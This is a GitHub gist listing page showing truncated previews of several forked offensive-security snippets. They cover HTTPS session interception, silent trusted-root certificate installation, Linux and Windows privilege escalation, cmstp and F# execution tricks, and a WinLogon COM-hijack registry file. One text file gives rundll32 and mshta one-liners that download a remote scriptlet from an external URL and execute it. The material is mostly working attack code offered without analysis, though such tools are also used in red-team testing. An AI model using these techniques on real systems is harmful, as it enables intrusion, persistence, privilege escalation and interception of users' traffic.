gavz
/ InterceptorThing.ps1
Created
January 24, 2018 16:19
Interceptor - Normal User No Admin Required.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
gavz
/ script.ps1
Created
January 24, 2018 16:52
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Verify Not Present | |
| ( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" }) | |
| #Import-Certificate | |
| ( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root | |
| #Prompted | |
| Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99 | |
gavz
/ LinuxPrivEsc.sh
Created
January 24, 2018 21:02
— forked from 1N3/LinuxPrivEsc.sh
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # `7MN. `7MF' | |
| # __, MMN. M | |
| #`7MM M YMb M pd""b. | |
| # MM M `MN. M (O) `8b | |
| # MM M `MM.M ,89 | |
| # MM M YMM ""Yb. | |
| #.JMML..JML. YM 88 | |
| # (O) .M' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-PublicKey | |
| { | |
| [OutputType([byte[]])] | |
| PARAM ( | |
| [Uri]$Uri | |
| ) | |
| if (-Not ($uri.Scheme -eq "https")) | |
| { | |
| Write-Error "You can only get keys for https addresses" |
gavz
/ cmstp.inf
Created
January 31, 2018 13:11
— forked from NickTyrer/cmstp.inf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;cmstp.exe /s cmstp.inf | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=UnRegisterOCXSection | |
| [UnRegisterOCXSection] |
gavz
/ fsharp.fsscript
Created
February 1, 2018 13:57
— forked from NickTyrer/fsharp.fsscript
fsi.exe inline execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
| open System.Management.Automation | |
| open System.Management.Automation.Runspaces | |
| open System | |
| let runSpace = RunspaceFactory.CreateRunspace() | |
| runSpace.Open() | |
| let pipeline = runSpace.CreatePipeline() |
gavz
/ popshellslikeitsatuesday.py
Created
February 1, 2018 14:16
— forked from makelariss/popshellslikeitsatuesday.py
NT AUTHORITY\SYSTEM through Handle Inheritance using Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| import enum, os, sys | |
| # https://twitter.com/highsenburger69 | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
gavz
/ instructions.txt
Created
February 1, 2018 14:24
— forked from NickTyrer/instructions.txt
xwizard_sct
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
| verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
| create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
| mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |
gavz
/ winlogon.reg
Created
February 11, 2018 19:35
— forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
gavz
/ getduid.cs
Created
February 12, 2018 21:12
— forked from Wack0/getduid.cs
clipc!GetOfflineDeviceUniqueID PoC.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| enum RETRIEVAL_METHOD { | |
| ODUID_DEFAULT = 0, | |
| ODUID_TPM_EK, | |
| ODUID_UEFI_VARIABLE_TPM, | |
| ODUID_UEFI_VARIABLE_RANDOMSEED, | |
| ODUID_UEFI_DEV_LOCK_UNLOCK, | |
| ODUID_XBOX_CONSOLE_ID // this should never be seen, with xbox one a different function is called to get the console ID |